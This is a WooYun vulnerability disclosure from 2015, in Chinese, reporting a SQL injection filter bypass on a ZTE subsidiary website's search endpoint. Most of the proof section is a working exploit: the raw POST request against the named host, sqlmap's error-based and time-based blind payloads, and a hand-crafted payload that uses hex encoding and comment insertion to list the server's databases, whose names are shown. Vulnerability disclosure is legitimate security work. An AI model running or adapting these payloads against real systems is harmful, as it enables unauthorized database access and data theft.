当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114315

漏洞标题:中兴某站SQL注入绕过

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-05-18 06:34

修复时间:2015-07-02 09:00

公开时间:2015-07-02 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

233

详细说明:

 WooYun: 中兴某分站6处SQL注入打包 
话说这个我真的没看出需要绕过么?直接union就出来了,顺便说下,这里还没修复。。。
POST /index.php?ac=search&at=result HTTP/1.1
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Referer: http://www.ztesoft.com:808/
Cookie: e25d4f441419921f549c45d086f5f27a=1431676163
Host: www.ztesoft.com:808
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
keyname=1&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
参数key,加引号报错。
mySQL info: Can not connect to MySQL server 
Time:Etc/GMT-8 2015-05-15 16-00-04 
SQL:SELECT COUNT(*) AS num FROM zte_document as a Left join zte_document_content as b On a.did=b.did WHERE a.lng='cn' AND a.isclass=1 AND a.islink=0 AND a.1\'\" like '%èˉ·è????¥??3é??èˉ?%' 
Error???You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\" like '%\xE8\xAF\xB7\xE8\xBE\x93\xE5\x85\xA5\xE5\x85\xB3\xE9\x94\xAE\xE' at line 1
Access Query Errors

漏洞证明:

直接跑,的确跑不出来,
下来说说绕过。
第一步: 空格替换成--%OA
---
Parameter: keyname (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: keyname=1 AND (SELECT 3634 FROM(SELECT COUNT(*),CONCAT(0x7162766b71
,(SELECT (ELT(3634=3634,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a)&keyword=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e
9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]
',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARAC
TER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyname=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DEdd)&keyword=%e8%af
%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e8%af%8d&lng=cn&mid=0
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEE
PTIME])))))[RANDSTR])
---
[16:13:11] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[16:13:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0
但是数据库跑不出来,
第二步:
使用hex获取,再加个注释绕过/**/
payload:
keybane=1 AND (SELECT 2505 FROM(SELECT COUNT(*),CONCAT(0x7162766b71,(SELECT MID((HEX(IFNULL(CAST(schema_name AS CHAR),0x20))),1,50) FROM INFORMATIO
N_SCHEMA/**/.SCHEMATA LIMIT 5,1),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATIO
N_SCHEMA/**/.CHARACTER_SETS GROUP BY x)a)
结果如下:
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ztesoft_poll
[*] ztesoft_static
[*] ztesoft_website

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-18 08:59

厂商回复:

感谢~

最新状态:

暂无